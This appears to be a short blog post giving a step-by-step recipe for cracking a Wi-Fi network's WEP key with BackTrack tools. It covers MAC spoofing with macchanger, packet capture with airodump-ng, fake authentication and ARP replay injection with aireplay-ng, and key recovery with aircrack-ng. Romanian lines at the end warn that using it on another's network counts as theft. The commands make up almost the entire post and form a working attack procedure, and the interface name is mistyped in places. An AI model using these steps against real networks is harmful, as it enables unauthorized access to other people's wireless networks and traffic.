Home > Uncategorized > Using Backtrack for Wireless

Using Backtrack for Wireless

  1. Open a Shell
  • airmon-ng
Under interface=> Device using “eth0” example…
  1. airmon-ng stop eht0
  2. ifconfig eht0 down
  3. macchanger –mac 00:11:22:33:44:55 eth0
  4. airmon-ng start eth0
  5. airodump-ng eth0
A box will appear, check the SSID.
  1. airodump-ng -c (channel) -w (filename) –bssid (bssid) eth0
Minimize the window now.
Open another Shell:
  1. aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 eth0
>> This is a packet injection process, it may or may not work…who cares..
  1. aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 eth0
Go back to your first window
Look at #DATA -There has to be AT LEAST 10.000 packets of data before cracking.
Open a THIRD Shell
  1. aircrack-ng -b (BSSID) (filename-01.cap)
Your result will be displayed.
Programe folosite de-alungul procesului:
  1. airmon-ng
  2. ifconfig
  3. macchanger
  4. airodump-ng
  5. aireplay-ng
  6. aircrack-ng
Daca n-a reusit, inseamna ca nu se potriveste placa de retea, si este nevoie sa ai WIRELESS, obligatoriu, altfel nu merge…
A se folosi in scopuri proprii! Numai daca ti-ai uitat tu parola la Wireless il poti folosi, altmiteri este considerat furt.
Categories: Uncategorized
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: